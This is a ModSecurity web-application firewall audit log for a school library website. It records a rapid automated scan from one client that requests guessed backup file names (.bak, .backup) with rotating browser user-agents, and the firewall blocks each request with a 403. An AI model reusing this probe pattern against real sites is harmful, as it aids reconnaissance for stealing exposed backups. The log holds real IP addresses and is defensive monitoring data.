[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226953262 2176 (- - -) Stopwatch2: 1747683226953262 2176; combined=785, p1=425, p2=334, p3=0, p4=0, p5=26, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0636471-Z-- --0c6ab212-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoowwAAABE 103.236.140.4 33904 103.236.140.4 8181 --0c6ab212-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994993 --0c6ab212-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0c6ab212-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226954959 1890 (- - -) Stopwatch2: 1747683226954959 1890; combined=708, p1=327, p2=355, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c6ab212-Z-- --1ba3b04e-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooxQAAABY 103.236.140.4 33904 103.236.140.4 8181 --1ba3b04e-B-- GET /smkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757582 --1ba3b04e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ba3b04e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226959257 1603 (- - -) Stopwatch2: 1747683226959257 1603; combined=683, p1=331, p2=325, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ba3b04e-Z-- --c5646705-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooyAAAAAA 103.236.140.4 33904 103.236.140.4 8181 --c5646705-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995000 --c5646705-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5646705-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226971486 1739 (- - -) Stopwatch2: 1747683226971486 1739; combined=667, p1=324, p2=316, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5646705-Z-- --abe93623-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooyQAAAAE 103.236.140.4 33904 103.236.140.4 8181 --abe93623-B-- GET /log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182413 --abe93623-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --abe93623-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226975999 1930 (- - -) Stopwatch2: 1747683226975999 1930; combined=750, p1=363, p2=359, p3=0, p4=0, p5=27, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abe93623-Z-- --3d8be701-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooygAAABI 103.236.140.4 33902 103.236.140.4 8181 --3d8be701-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530712 --3d8be701-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d8be701-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226977203 1807 (- - -) Stopwatch2: 1747683226977203 1807; combined=767, p1=412, p2=316, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8be701-Z-- --ad95b00b-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIooywAAAAs 103.236.140.4 33760 103.236.140.4 8181 --ad95b00b-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995013 --ad95b00b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad95b00b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226977933 1674 (- - -) Stopwatch2: 1747683226977933 1674; combined=635, p1=303, p2=283, p3=0, p4=0, p5=49, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad95b00b-Z-- --5a7ccc1c-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoozgAAAAk 103.236.140.4 33760 103.236.140.4 8181 --5a7ccc1c-B-- GET /my.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871703 --5a7ccc1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a7ccc1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226981687 1857 (- - -) Stopwatch2: 1747683226981687 1857; combined=778, p1=455, p2=295, p3=0, p4=0, p5=28, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a7ccc1c-Z-- --82dccf64-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoo0AAAAAQ 103.236.140.4 33760 103.236.140.4 8181 --82dccf64-B-- GET /erpustakaansmkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633389 --82dccf64-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --82dccf64-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226984984 1774 (- - -) Stopwatch2: 1747683226984984 1774; combined=718, p1=336, p2=356, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82dccf64-Z-- --ff17eb71-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo0wAAAAM 103.236.140.4 33760 103.236.140.4 8181 --ff17eb71-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700161 --ff17eb71-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff17eb71-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227000393 1630 (- - -) Stopwatch2: 1747683227000393 1630; combined=643, p1=316, p2=299, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff17eb71-Z-- --edd2a507-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1AAAABg 103.236.140.4 33760 103.236.140.4 8181 --edd2a507-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757605 --edd2a507-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edd2a507-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227003085 1550 (- - -) Stopwatch2: 1747683227003085 1550; combined=622, p1=317, p2=279, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edd2a507-Z-- --5f5ac026-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1QAAAAg 103.236.140.4 33760 103.236.140.4 8181 --5f5ac026-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530739 --5f5ac026-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5f5ac026-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227005924 1512 (- - -) Stopwatch2: 1747683227005924 1512; combined=601, p1=300, p2=275, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f5ac026-Z-- --368b146e-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1gAAAA0 103.236.140.4 33760 103.236.140.4 8181 --368b146e-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871718 --368b146e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --368b146e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227008392 1796 (- - -) Stopwatch2: 1747683227008392 1796; combined=648, p1=335, p2=287, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --368b146e-Z-- --b9a0bc0b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1wAAAAU 103.236.140.4 33904 103.236.140.4 8181 --b9a0bc0b-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530742 --b9a0bc0b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b9a0bc0b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227008561 1822 (- - -) Stopwatch2: 1747683227008561 1822; combined=676, p1=318, p2=330, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9a0bc0b-Z-- --5226c638-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2AAAABQ 103.236.140.4 33904 103.236.140.4 8181 --5226c638-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871723 --5226c638-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5226c638-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227012733 1732 (- - -) Stopwatch2: 1747683227012733 1732; combined=735, p1=321, p2=379, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5226c638-Z-- --43afeb41-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2gAAABM 103.236.140.4 33760 103.236.140.4 8181 --43afeb41-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.1) Gecko/20100101 Firefox/66.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182428 --43afeb41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43afeb41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227016674 1506 (- - -) Stopwatch2: 1747683227016674 1506; combined=598, p1=305, p2=267, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43afeb41-Z-- --3d49910f-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2wAAAAo 103.236.140.4 33760 103.236.140.4 8181 --3d49910f-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871734 --3d49910f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d49910f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
